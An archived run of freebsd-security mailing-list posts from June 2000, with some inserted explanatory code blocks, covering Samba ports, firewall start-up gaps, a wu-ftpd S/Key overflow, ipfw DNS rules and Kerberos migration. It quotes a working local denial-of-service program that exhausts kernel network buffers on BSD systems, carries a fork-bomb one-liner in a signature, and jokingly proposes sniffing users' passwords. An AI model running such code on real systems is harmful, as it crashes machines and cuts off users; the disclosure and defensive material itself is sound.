Cheers,

-Kameron
(kgasso@blort.org)

From owner-freebsd-security Tue Jun 13 11:45:27 2000
From: Szilveszter Adam
Date: Tue, 13 Jun 2000 20:45:19 +0200
To: freebsd-security@FreeBSD.ORG
Subject: Re: netbios
Message-ID: <20000613204519.A19343@petra.hos.u-szeged.hu>
In-Reply-To: ; from kgasso@blort.org on Tue, Jun 13, 2000 at 11:18:48AM -0700

On Tue, Jun 13, 2000 at 11:18:48AM -0700, Kameron Gasso wrote:
> On Tue, 13 Jun 2000, Matt Watson wrote:
> > Kameron, actually see if they are already running in the background; nmbd
> > and smbd generally run as daemons and not from inetd.conf.
>
> Nope, neither running in bg. Suppose it would vary per version of Samba;
> I recall that when I played with Redhat Linux (blah), it does start
> smbd/nmbd in daemon mode and other versions I've used start both from inetd.

On the Linux box I have access to (Debian 2.2) there is actually a choice:
you can run Samba either way. I do not know which is the default because the
sysadmin may have edited the configuration files, but the startup script
checks whether Samba is run from inetd or not.
I do not know what the default is on FreeBSD, either. I do not have Samba
installed and consequently I do not have the NetBIOS port open, either.

If you are sure you are not running Samba now, you could use e.g. lsof from
ports to find out what file (if any) is actually using the network socket.

--
Regards:

Szilveszter ADAM
Szeged University
Szeged Hungary

From owner-freebsd-security Tue Jun 13 12:26:53 2000
From: (envelope-from freebsd-contact@research.poc.net)
Date: Tue, 13 Jun 2000 15:26:45 -0400 (EDT)
To: freebsd-security@freebsd.org
Subject: rc.network firewall init

I've noticed that FreeBSD 4.0's /etc/rc.network brings up network interfaces
before initializing firewall behavior. In the case of IPFIREWALL, when not
compiled into the kernel, this causes a short window of 'exposure' during
startup. In the time between network connectivity being established and the
IPFIREWALL KLD being loaded, all interfaces are up and unfiltered. (An almost
identical problem exists even when IPFIREWALL *is* compiled into the kernel,
but the kernel option IPFIREWALL_DEFAULT_TO_ACCEPT is specified.)

One successful TCP handshake during this window can establish a connection
that survives the firewall loading, due to IPFIREWALL's non-statefulness and
the (resultant) commonality of "allow tcp from any to any established".
--Anatole Shaw

From owner-freebsd-security Tue Jun 13 15:10:08 2000
From: Igor Roshchin
Date: Tue, 13 Jun 2000 18:10:02 -0400 (EDT)
To: security@freebsd.org
Subject: wu-ftpd vulnerability - is FreeBSD's port vulnerable ?
Message-Id: <200006132210.SAA61771@giganda.komkon.org>

Since nothing about this vulnerability appeared on the -security list, nor
were any changes made since this posting, I wonder if the FreeBSD port of
wu-ftpd is vulnerable (and I am forwarding this just in case it was not
noticed).

Regards,

Igor

----- Forwarded message from Automatic digest processor -----

From owner-BUGTRAQ@LISTS.SECURITYFOCUS.COM Fri Jun 9 03:02:56 2000
Date: Fri, 9 Jun 2000 00:00:09 -0700
From: Automatic digest processor
Reply-To: Bugtraq List
Subject: BUGTRAQ Digest - 7 Jun 2000 to 8 Jun 2000 (#2000-127)
To: Recipients of BUGTRAQ digests
Message-Id: <20000609070011.8F28F1EF0E@lists.securityfocus.com>

<..skip..>

-- Start of included mail

From: Michal Zalewski
Date: Wed, 7 Jun 2000 13:40:26 +0200
Subject: Yet another heap overflow in wu-ftpd and so on...

This is the result of my 20-minute mini-audit of the wu-ftpd 2.6.0 source
code. I won't spend my time analysing source code nor doing any debugging. I
simply issued a command like:

    grep -nE 'sprintf.*\%s|strcat|strcpy' *.c

Gosh... Not even thinking about many, many other dangerous functions and
mechanisms. Results? Yes, some:

1.
heap overflow in S/Key authorization mechanism
-------------------------------------------------

The problem affects wu-ftpd installations with S/Key support enabled. In
fact, this mechanism, instead of increasing site security, results in a
buffer overflow at the time of user login on some machines. What is the
problem? Well...

-- ftpd.c --

    #if defined(SKEY) && !defined(__NetBSD__)
    [...]
    /* skey_challenge - additional password prompt stuff */
    char *skey_challenge(char *name, struct passwd *pwd, int pwok)
    {
        static char buf[128];
        char sbuf[40];
        struct skey skey;

        /* Display s/key challenge where appropriate. */
        if (pwd == NULL || skeychallenge(&skey, pwd->pw_name, sbuf))
            sprintf(buf, "Password required for %s.", name);
        else
            sprintf(buf, "%s %s for %s.", sbuf,
                    pwok ? "allowed" : "required", name);
        return (buf);
    }
    #endif

-- EOF --

Well... The buffer (buf, size = 128 bytes) is placed on the heap, and I'm not
sure it could be exploited any way (read: if there is any important data on
the heap at the time of authorization, or any data processed later with the
assumption it will be zeroed - could be, I guess). Aah, an example? ;):

    USER ;)

No, no SEGV or crash, simply an overwritten piece of memory. Some debugging
would be nice. The problem does NOT affect systems without S/Key support
compiled into ftpd and does NOT affect NetBSD libskey (see #ifdefs).

2. i guess you'll be able to find it by yourself, so...
-------------------------------------------------------

More? Probably I'll be killed ;) but I guess almost anyone who issued a
similar command to the above 'grep' can see it clearly. It's rather obvious
that there's an overflow in an optional feature introduced in recent wu-ftpd
versions, called 'internal ls'. But this problem has been discovered by
someone else (I'm not sure who did it, someone from teso or Lam3rZ) days ago.
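Added example (not wu-ftpd's code and not from the advisory): the same two challenge messages built with snprintf() so the 128-byte buffer can never be overrun, plus the length arithmetic that shows at which login-name length the original sprintf() version exceeds it. fake_skeychallenge() is a constructed stand-in for libskey's call so the block runs stand-alone; skey_challenge_len() and skey_challenge_safe() are constructed names.

```c
#include <stdio.h>
#include <string.h>

#define CHAL_BUF 128   /* size of the static buf[] in the advisory's snippet */
#define SBUF_LEN 40    /* size of sbuf[] there */

/* Constructed stand-in for skeychallenge(): returns 0 and fills sbuf when
 * the user has an S/Key entry, nonzero otherwise. Only "skeyuser" has one. */
static int fake_skeychallenge(const char *name, char *sbuf, size_t len)
{
    if (strcmp(name, "skeyuser") != 0)
        return -1;
    snprintf(sbuf, len, "s/key 97 zz12345");
    return 0;
}

/* Bytes the formatted challenge needs, excluding the terminating NUL.
 * The original code never compared this against sizeof buf; with the
 * no-S/Key format, a name of 106 bytes or more already exceeds 128. */
size_t skey_challenge_len(const char *name, int has_skey, const char *sbuf, int pwok)
{
    if (!has_skey)
        return strlen("Password required for ") + strlen(name) + 1;  /* "." */
    return strlen(sbuf) + 1 + strlen(pwok ? "allowed" : "required")
           + strlen(" for ") + strlen(name) + 1;
}

/* Bounded replacement for the sprintf() calls. Returns 1 when the whole
 * message fit in buf, 0 when snprintf() had to truncate it, so the caller
 * can reject an oversized login name instead of handing out a clipped
 * prompt (and buf is always NUL-terminated either way). */
int skey_challenge_safe(char *buf, size_t buflen, const char *name, int pwok)
{
    char sbuf[SBUF_LEN];
    int n;

    if (fake_skeychallenge(name, sbuf, sizeof sbuf) != 0)
        n = snprintf(buf, buflen, "Password required for %s.", name);
    else
        n = snprintf(buf, buflen, "%s %s for %s.",
                     sbuf, pwok ? "allowed" : "required", name);

    /* snprintf() returns the length it wanted to write; >= buflen means
     * the output was cut, which is exactly the case sprintf() overflowed. */
    return n >= 0 && (size_t)n < buflen;
}

int main(void)
{
    char buf[CHAL_BUF];
    char longname[201];                     /* constructed 200-byte login name */

    memset(longname, 'A', 200);
    longname[200] = '\0';

    skey_challenge_safe(buf, sizeof buf, "alice", 1);
    printf("short name  -> \"%s\"\n", buf);
    printf("needs %zu bytes + NUL, buffer is %d\n",
           skey_challenge_len("alice", 0, NULL, 1), CHAL_BUF);

    int fit = skey_challenge_safe(buf, sizeof buf, longname, 1);
    printf("200-byte name -> fit=%d, needs %zu bytes + NUL (sprintf would overrun)\n",
           fit, skey_challenge_len(longname, 0, NULL, 1));
    return 0;
}
```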
Sorry, anyway :)

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

-- End of included mail.

From owner-freebsd-security Tue Jun 13 15:27:35 2000
Approved-By: aleph1@SECURITYFOCUS.COM
Received: from userd54.wide.net.ar (HELO gutenberg.ussrback.net) (200.49.76.54) by mail.securityfocus.com with SMTP; 2 Jun
2000 11:44:49 -0000
Date: Wed, 2 Aug 2000 08:41:53 -0300
From: Ussr Labs
Reply-To: Ussr Labs
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected

Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability

Release Date: April 29, 2000

Systems Affected:
    FreeBSD 3.3-RELEASE
    FreeBSD 4.0-RELEASE
    FreeBSD 5.0 (maybe)
    Openbsd 2.5
    Openbsd 2.6
    Openbsd 2.7 (maybe)
    NetBSD 1.4.1

THE PROBLEM

From an original posting made about last September by Sven Berkenvs
(sven@ILSE.NL) to bugtraq:

--- Forward ---
I stumbled across a denial of service attack on FreeBSD systems, where an
unprivileged user can panic the kernel. Quick and dirty testing (code
attached at the end of this mail) showed OpenBSD is vulnerable too:

FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to test it
on older FreeBSD versions.

OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
The kernel logs one "/bsd: mb_map full" and all processes trying to send
something over the network get stuck waiting in mbuf. Locally the system
continues to function. Tested by a friend.

NetBSD: Not available, but it is highly probable that the affected code in
OpenBSD is from its parent NetBSD.
--- End of Forward ---

Upon testing this code on the new versions of *bsd the exploit still works.
FreeBSD - 3.3-RELEASE: reboots the pc
FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: in the logs receives
    /kernel: xl0: no memory for rx list -- packet dropped!
  All network connection is dead and the route table is a mess.
FreeBSD - 5.0-Current: Untested
Openbsd - 2.5 (with NMBCLUSTERS=8192): mb_map full
Openbsd - 2.6 (with patches up to May 25, 2000): mb_map full
Openbsd - 2.7: Untested
NetBSD - 1.4.1: /netbsd: WARNING: mclpool limit reached; increase NMBCLUS
  The network connection is dead.
NetBSD - 1.4.2: Untested

- From what I have tested on, Linux does not have any issue with this piece of code. As for the other unices, they have not been tested.

THE CODE

The original code written by Sven Berkenvs that causes this:

    /* The header names were lost in the archive copy; these are the ones
       the calls below need (socketpair/setsockopt, fcntl, write, exit). */
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <stdlib.h>

    #define BUFFERSIZE 204800

    extern int main(void)
    {
        int p[2], i;
        char crap[BUFFERSIZE];

        /* Create socket pairs with oversized buffers and fill both ends,
           until socketpair() itself fails. */
        while (1) {
            if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                break;
            i = BUFFERSIZE;
            setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
            setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
            setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
            setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
            fcntl(p[0], F_SETFL, O_NONBLOCK);
            fcntl(p[1], F_SETFL, O_NONBLOCK);
            write(p[0], crap, BUFFERSIZE);
            write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
    }

Underground Security Systems Research
http://www.ussrback.com

Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN, Sub, prizm, b0f, Technotronic and Rfp.

Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
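For an operator the useful part of the report above is the set of kernel messages each system emits when its mbuf clusters run out, because those are what appears in syslog on a box under this kind of pressure. The detector below is an added example for this archive page, not part of the USSR Labs post or of any BSD: it matches the three messages quoted in the report against constructed syslog lines. The hostnames, timestamps, the sshd line and the per-signature repeat thresholds are all assumptions (a single "no memory for rx list" drop is treated as noise, a run of them as exhaustion).

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Kernel messages quoted in the report, one per system, paired with the number
# of repeats per host before an alert is raised (thresholds are our assumption).
SIGNATURES = {
    "freebsd_rx_list": (re.compile(r"no memory for rx list -- packet dropped"), 3),
    "openbsd_mb_map": (re.compile(r"\bmb_map full\b"), 1),
    "netbsd_mclpool": (re.compile(r"mclpool limit reached"), 1),
}

# Classic BSD syslog line: "Mon DD HH:MM:SS host program: message"
SYSLOG = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) (?P<prog>[^:]+): (?P<msg>.*)$"
)

# Constructed sample log: hosts, times and the sshd line are made up.
SAMPLE_LOG = """\
Jun 13 22:10:01 gw /kernel: xl0: no memory for rx list -- packet dropped!
Jun 13 22:10:01 gw /kernel: xl0: no memory for rx list -- packet dropped!
Jun 13 22:10:02 gw /kernel: xl0: no memory for rx list -- packet dropped!
Jun 13 22:10:02 gw /kernel: xl0: no memory for rx list -- packet dropped!
Jun 13 22:11:40 obsd /bsd: mb_map full
Jun 13 22:12:05 nbsd /netbsd: WARNING: mclpool limit reached; increase NMBCLUSTERS
Jun 13 22:12:06 gw sshd[123]: Accepted publickey for alice from 192.0.2.7 port 51022
""".splitlines()


def classify(line: str) -> Optional[Tuple[str, str]]:
    """Return (host, signature_name) when a syslog line carries one of the messages."""
    m = SYSLOG.match(line)
    if m is None:
        return None
    for name, (pattern, _threshold) in SIGNATURES.items():
        if pattern.search(m["msg"]):
            return m["host"], name
    return None


def scan(lines: List[str]) -> Dict[str, Dict[str, int]]:
    """Count signature hits per host: {host: {signature: count}}."""
    counts: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for line in lines:
        hit = classify(line)
        if hit is not None:
            host, name = hit
            counts[host][name] += 1
    return {host: dict(c) for host, c in counts.items()}


def alerts(counts: Dict[str, Dict[str, int]]) -> List[str]:
    """Hosts where some signature's count reached that signature's threshold."""
    return sorted(
        host for host, c in counts.items()
        if any(n >= SIGNATURES[name][1] for name, n in c.items())
    )


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print(found)
    print("mbuf exhaustion suspected on:", alerts(found))
```

On a host that trips the detector, `netstat -m` shows current mbuf and cluster usage against the configured limit and is the quickest way to confirm that the log burst really is exhaustion rather than a one-off drop.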
Feedback: Please send suggestions, updates, and comments to:
Underground Security Systems Research
mail:labs@ussrback.com
http://www.ussrback.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use

iQA/AwUBOYgJAK3JcbWNj6DDEQJNMQCgzvEMALCmfNJ9EpPVF1uRNFiniC8AoKsV
ucQIKYXTFMT6TzTx3JNHVw0L
=LDeL
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jun 13 15:40:33 2000
Date: Tue, 13 Jun 2000 17:40:29 -0500 (CDT)
From: Mike Silbersack
To: security@freebsd.org
Subject: Re: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected

Hmmm, could the lists be changed to require that their name is in the To: or Cc: of any message posted to them? It would be nice to see bounces like this one blocked.
Mike "Silby" Silbersack

From owner-freebsd-security Tue Jun 13 16:25: 9 2000
Date: Tue, 13 Jun 2000 16:25:04 -0700 (PDT)
From: John F Cuzzola
To: security@FreeBSD.ORG
Subject: ipfw log entry

Hi everyone,

On one of our firewalls numerous entries looking like this were logged:

    ipfw: -1 Refuse TCP 209.1.224.16 107.13.119.32 in via ep3 Fragment = 147

I haven't seen this one before. Is this a packet that FreeBSD explicitly blocks regardless of the firewall rules and if so what is its intent/purpose? (Basically what I'm asking is does this look like hacker activity).

Thanks

From owner-freebsd-security Tue Jun 13 21:12:53 2000
Date: Tue, 13 Jun 2000 21:12:51 -0700
From: "Andrey A. Chernov"
To: Igor Roshchin
Cc: security@freebsd.org
Subject: Re: wu-ftpd vulnerability - is FreeBSD's port vulnerable ?
Message-ID: <20000613211251.A86351@freebsd.org>
In-Reply-To: <200006132210.SAA61771@giganda.komkon.org>; from str@giganda.komkon.org on Tue, Jun 13, 2000 at 06:10:02PM -0400
Organization: Biomechanoid

On Tue, Jun 13, 2000 at 06:10:02PM -0400, Igor Roshchin wrote:
> assumption it will be zeroed - could be, I guess). Aah, an example?;):
> USER ;) No, no SEGV or crash, simply
> overwritten piece of memory. Some debugging would be nice.

I can say even without debugging that to activate this overflow a near-128-byte user name must be present in /etc/passwd

-- 
Andrey A. Chernov
http://ache.pp.ru/

From owner-freebsd-security Tue Jun 13 22:25:13 2000
Date: Wed, 14 Jun 2000 00:18:21 -0500 (CDT)
From: Tushar Patel
Message-Id: <200006140518.AAA22768@ecpi.com>
To: freebsd-security@freebsd.org
Subject: Kerberos for POP, radius, ftp etc

We want to move our authentication server as kerberos base. We have many users (700+) who get authenticated using radius server (MD5 password data base). They also use same password for the POP mail and ftp.
Is it possible to populate kerberos database from the existing MD5 password data base?

Is ftpd and POP3d daemon kerberized?

Can we setup failover kerberos authentication server?

Can some body point me in the right direction on the subject?

Thanks,
Tushar

From owner-freebsd-security Tue Jun 13 23:15:16 2000
Date: Tue, 13 Jun 2000 23:15:46 -0700
From: "Chaosmage"
Message-ID: <000901bfd5c7$fa6fc3a0$4a461018@dnpt1.occa.home.com>
Subject: subscribe

subscribe
From owner-freebsd-security Wed Jun 14 2:14:14 2000
Date: Wed, 14 Jun 2000 10:13:35 +0100
From: Adam Laurie
Organization: A.L. Group plc
Message-ID: <39474CBF.30869244@algroup.co.uk>
To: Hugh Ho
Cc: freebsd-security@freebsd.org
Subject: Re: IPFW rules for DNS?
References: <20000613014237.10942.qmail@web210.mail.yahoo.com>

Hugh Ho wrote:
> 
> I need to do nslookup quite often, and I have the following IPFW rules which
> allow nslookup to talk to my ISP's DNS server:
> 
> allow udp from ${my_ip} to ${dns_server} 53
> allow udp from ${dns_server} 53 to ${my_ip}
> 
> Problem with the above rules is that people can pass IPFW if they use UDP port
> 53 with a spoofed IP that matches my ISP's DNS server. Is there a way to fix my
> problem?

    $fwcmd add pass udp from any to ${dns_server} 53
    $fwcmd add deny log udp from any to ${my_ip} 0-1023,1110,2049
    $fwcmd add pass udp from any to any

This blocks low port udp plus high ports used by NFS (you need to add any others you might be using) but allows the high port DNS replies. You will get occasional DNS lookup failures when the client happens to choose port 1110 or 2049 for its reply listener.
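The difference between Hugh's original pair of rules, Adam's port-based variant above, and the keep-state/check-state approach that Frank Cameron and Boris Karnaukh suggest further down the thread is easiest to see by running the same constructed datagrams through a small model of each. What follows is an added example written for this archive page; it is not ipfw and not anyone's posted ruleset. The addresses, the 5-second dynamic-entry lifetime and the packet trace are made up, and the model follows ipfw's semantics only as far as the quoted rules need: an outbound query that matches the keep-state rule records its 4-tuple, an inbound datagram is allowed by check-state only if it reverses a live entry, and entries expire.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

MY_IP = "192.0.2.10"          # constructed stand-in for ${my_ip}
DNS_SERVER = "198.51.100.53"  # constructed stand-in for ${dns_server}
DYN_UDP_LIFETIME = 5.0        # assumed lifetime (seconds) of a dynamic UDP entry


@dataclass(frozen=True)
class Pkt:
    """One UDP datagram as seen on the external interface."""
    src: str
    sport: int
    dst: str
    dport: int
    inbound: bool  # True when it arrives from the outside


def stateless(p: Pkt) -> str:
    """Hugh's two rules: the reply rule trusts whatever source address and port the packet claims."""
    if not p.inbound and p.src == MY_IP and p.dst == DNS_SERVER and p.dport == 53:
        return "allow"
    if p.inbound and p.src == DNS_SERVER and p.sport == 53 and p.dst == MY_IP:
        return "allow"
    return "deny"


def low_port_deny(p: Pkt) -> str:
    """Adam's three rules: pass queries, deny udp to local ports 0-1023, 1110, 2049, pass the rest."""
    if p.dst == DNS_SERVER and p.dport == 53:
        return "allow"
    if p.dst == MY_IP and (p.dport <= 1023 or p.dport in (1110, 2049)):
        return "deny"
    return "allow"


class Stateful:
    """check-state, then 'allow udp from MY_IP to DNS_SERVER 53 keep-state', then implicit deny."""

    def __init__(self) -> None:
        self.dyn: Dict[Tuple[str, int, str, int], float] = {}  # 4-tuple -> expiry time

    def check(self, p: Pkt, now: float) -> str:
        self.dyn = {k: t for k, t in self.dyn.items() if t > now}  # drop expired entries
        if (p.dst, p.dport, p.src, p.sport) in self.dyn:            # check-state: reversed tuple
            return "allow"
        if not p.inbound and p.src == MY_IP and p.dst == DNS_SERVER and p.dport == 53:
            self.dyn[(p.src, p.sport, p.dst, p.dport)] = now + DYN_UDP_LIFETIME  # keep-state
            return "allow"
        return "deny"


def run_traces() -> Dict[str, List[str]]:
    """Constructed trace: a real query/reply pair, two datagrams spoofing DNS_SERVER:53
    as their source, and (stateful only) the real reply arriving after the entry expired."""
    query = Pkt(MY_IP, 40000, DNS_SERVER, 53, inbound=False)
    reply = Pkt(DNS_SERVER, 53, MY_IP, 40000, inbound=True)
    spoof_nfs = Pkt(DNS_SERVER, 53, MY_IP, 2049, inbound=True)    # aimed at the NFS port
    spoof_high = Pkt(DNS_SERVER, 53, MY_IP, 40001, inbound=True)  # unsolicited high port
    trace = [query, reply, spoof_nfs, spoof_high]
    fw = Stateful()
    return {
        "stateless": [stateless(p) for p in trace],
        "low_port_deny": [low_port_deny(p) for p in trace],
        "stateful": [fw.check(p, t) for p, t in zip(trace, (0.0, 0.1, 0.2, 0.3))]
        + [fw.check(reply, DYN_UDP_LIFETIME + 1.0)],
    }


if __name__ == "__main__":
    for name, verdicts in run_traces().items():
        print(f"{name:14s} {verdicts}")
```

The trace makes one point the thread's prose only implies: Adam's rules protect the services on the listed ports, but a datagram spoofing the resolver's address still reaches any unprivileged local port, so the DNS client itself is no better off. Only the dynamic entry ties an inbound reply to a query this host actually sent, and only for as long as the entry lives, which is why the late reply in the last column is dropped.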
cheers,
Adam
-- 
Adam Laurie                   Tel: +44 (181) 742 0755
A.L. Digital Ltd.             Fax: +44 (181) 742 5995
Voysey House
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers

From owner-freebsd-security Wed Jun 14 4:27:12 2000
Date: Wed, 14 Jun 2000 07:27:42 -0400
From: "Cameron, Frank"
To: "'Hugh Ho'"
Cc: "'freebsd-security@FreeBSD.ORG'"
Subject: RE: IPFW rules for DNS?

The recent ipfw supports the keep-state option:

    allow udp from ${my_ip} to ${dns_server} 53 keep-state

-frank

> -----Original Message-----
> From: Hugh Ho [SMTP:hho321@yahoo.com]
> Sent: Monday, June 12, 2000 9:43 PM
> To: freebsd-security@FreeBSD.ORG
> Subject: IPFW rules for DNS?
> 
> I need to do nslookup quite often, and I have the following IPFW rules
> which
> allow nslookup to talk to my ISP's DNS server:
> 
> allow udp from ${my_ip} to ${dns_server} 53
> allow udp from ${dns_server} 53 to ${my_ip}
> 
> Problem with the above rules is that people can pass IPFW if they use UDP
> port
> 53 with a spoofed IP that matches my ISP's DNS server. Is there a way to
> fix my
> problem?
> 
> Thanks.
> 
> -Hugh
> 
> __________________________________________________
> Do You Yahoo!?
> Yahoo! Photos -- now, 100 FREE prints!
> http://photos.yahoo.com

From owner-freebsd-security Wed Jun 14 7:19:45 2000
Message-Id: <200006141417.e5EEHi431392@cwsys.cwsent.com>
Date: Wed, 14 Jun 2000 07:16:50 -0700
From: Cy Schubert - ITSD Open Systems Group
To: Tushar Patel
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Kerberos for POP, radius, ftp etc
In-reply-to: Your message of "Wed, 14 Jun 2000 00:18:21 CDT." <200006140518.AAA22768@ecpi.com>

In message <200006140518.AAA22768@ecpi.com>, Tushar Patel writes:
> 
> We want to move our authentication server as kerberos base.
> We have many users (700+) who get authenticated using radius server (
> MD5 password data base). They also use same password for the POP
> mail and ftp.
> 
> Is it possible to populate kerberos database from the existing MD5 password
> data base?

No.

> Is ftpd and POP3d daemon kerberized?

The MIT ftpd is kerberized. The FreeBSD daemon is also, with the right compile options, kerberized.

You can get kerberized pop3d daemons.

> Can we setup failover kerberos authentication server?

Yes

> Can some body point me in the right direction on the subject?

Read the docs that come with MIT Kerberos.
Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Wed Jun 14 7:58:39 2000
Date: Wed, 14 Jun 2000 09:51:38 -0500 (CDT)
From: Tushar Patel
Message-Id: <200006141451.JAA08402@ecpi.com>
In-Reply-To: <200006141417.e5EEHi431392@cwsys.cwsent.com> from Cy Schubert - ITSD Open Systems Group at "Jun 14, 0 07:16:50 am"
To: Cy.Schubert@uumail.gov.bc.ca
Cc: freebsd-security@freebsd.org
Subject: Re: Kerberos for POP, radius, ftp etc

> > Is it possible to populate kerberos database from the existing MD5 password
> > data base?
> 
> No.

Can we not copy the password from the master.password file and put it in the file structure of the kerberos?

So, how do people change the authentication process to kerberos without involving the end user?

Thanks,
Tushar

> > Is ftpd and POP3d daemon kerberized?
> 
> The MIT ftpd is kerberized. The FreeBSD daemon is also, with the right
> compile options, kerberized.
> 
> You can get kerberized pop3d daemons.
> 
> > Can we setup failover kerberos authentication server?
> 
> Yes
> 
> > Can some body point me in the right direction on the subject?
> 
> Read the docs that come with MIT Kerberos.
> 
> Regards,                       Phone:  (250)387-8437
> Cy Schubert                    Fax:    (250)387-5766
> Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
> Open Systems Group, ITSD, ISTA
> Province of BC

From owner-freebsd-security Wed Jun 14 8:16:26 2000
Date: Wed, 14 Jun 2000 17:11:30 +0200
From: Gabor Zahemszky
To: freebsd-security@freebsd.org
Subject: Re: rc.network firewall init
Message-ID: <20000614171130.E471@zg.CoDe.hu>
In-Reply-To: from freebsd-contact@research.poc.net on Tue, Jun 13, 2000 at 03:26:45PM -0400

On Tue, Jun 13, 2000 at 03:26:45PM -0400, freebsd-contact@research.poc.net wrote:
> I've noticed that FreeBSD 4.0's /etc/rc.network brings up network
> interfaces before initializing firewall behavior.
> 
> In the case of IPFIREWALL, when not compiled into the kernel, this causes
> a short window of 'exposure' during startup. In the time between network
> connectivity being established, and the IPFIREWALL KLD being loaded, all
> interfaces are up and unfiltered.
> (An almost identical problem exists
> even when IPFIREWALL *is* compiled into the kernel, but the kernel option
> IPFIREWALL_DEFAULT_TO_ACCEPT is specified.)
> 
> One successful TCP handshake during this window can establish a connection
> that survives the firewall loading, due to IPFIREWALL's non-statefulness

1) Well, in 4.x ipfw _is_ stateful, but as a new feature, maybe not so many people use it.

2) This problem exists, if somebody is using the other firewall, ipf, as its default actions are pass (yes, we can change it with that non-documented option)

    options IPFILTER_DEFAULT_BLOCK #kernel ipfilter default block

Conclusion: don't use a KLD firewall! (or maybe somebody will restructure our rc.network script, and put in those changes, which will make it easier to use ipf instead of ipfw.)

ZGabor at CoDe dot HU

-- 
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X"

From owner-freebsd-security Wed Jun 14 8:46:22 2000
Date: Mon, 12 Jun 2000 22:44:02 +0900
From: Randy Bush
To: freebsd-security@freebsd.org
Subject: netscape and /etc/pwd.db

oddity from logs.

    Jun 11 10:48:22 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument
    Jun 11 10:54:39 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument

i was not on the same continent as my workstation when this was logged. any hints?
randy

From owner-freebsd-security Wed Jun 14 9:19:43 2000
Date: Wed, 14 Jun 2000 11:19:35 -0500 (CDT)
From: Frank Tobin
To: FreeBSD-security mailing list
Subject: Re: Kerberos for POP, radius, ftp etc
In-Reply-To: <200006141451.JAA08402@ecpi.com>

Tushar Patel, at 09:51 -0500 on Wed, 14 Jun 2000, wrote:

> Can we not copy the password from the master.password file and put it in the
> file structure of the kerberos?

Different passphrase mechanisms.

> So, how do people change the authentication process to kerberos without
> involving the end user?

Put a temporary mechanism into your login daemons to sniff passwords so you can then initialize your kdc for a user when he/she next logs in :)

-- 
Frank Tobin                     http://www.uiuc.edu/~ftobin/

"To learn what is good and what is to be valued, those truths which cannot be shaken or changed."  Myst: The Book of Atrus

From owner-freebsd-security Wed Jun 14 9:25: 3 2000
Date: Wed, 14 Jun 2000 18:24:39 +0200 (SAT)
From: John Hay
Message-Id: <200006141624.e5EGOdb09165@zibbi.mikom.csir.co.za>
In-Reply-To: from Randy Bush at "Jun 12, 2000 10:44:02 pm"
To: randy@psg.com (Randy Bush)
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: netscape and /etc/pwd.db

> oddity from logs.
> 
> Jun 11 10:48:22 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument
> Jun 11 10:54:39 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument
> 
> i was not on the same continent as my workstation when this was logged. any
> hints?

I have seen this only when trying to start a second netscape. It has been like that for years.
John
-- 
John Hay -- John.Hay@mikom.csir.co.za

From owner-freebsd-security Wed Jun 14 9:39:25 2000
Date: Wed, 14 Jun 2000 17:47:06 +0100
From: User Datagram Protocol
Reply-To: User Datagram Protocol
To: freebsd-security@freebsd.org, Ussr Labs
Mail-Followup-To: freebsd-security@freebsd.org, labs@USSRBACK.COM
Subject: Re: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected
Message-ID: <20000614174706.F78775@closed-networks.com>
Organization: Closed Networks Limited, London, UK

Eww. What a lame DoS attack.

On Wed, Aug 02, 2000 at 08:41:53AM -0300, Ussr Labs wrote:
> an unprivileged user can panic the kernel. Quick and dirty testing
> ...

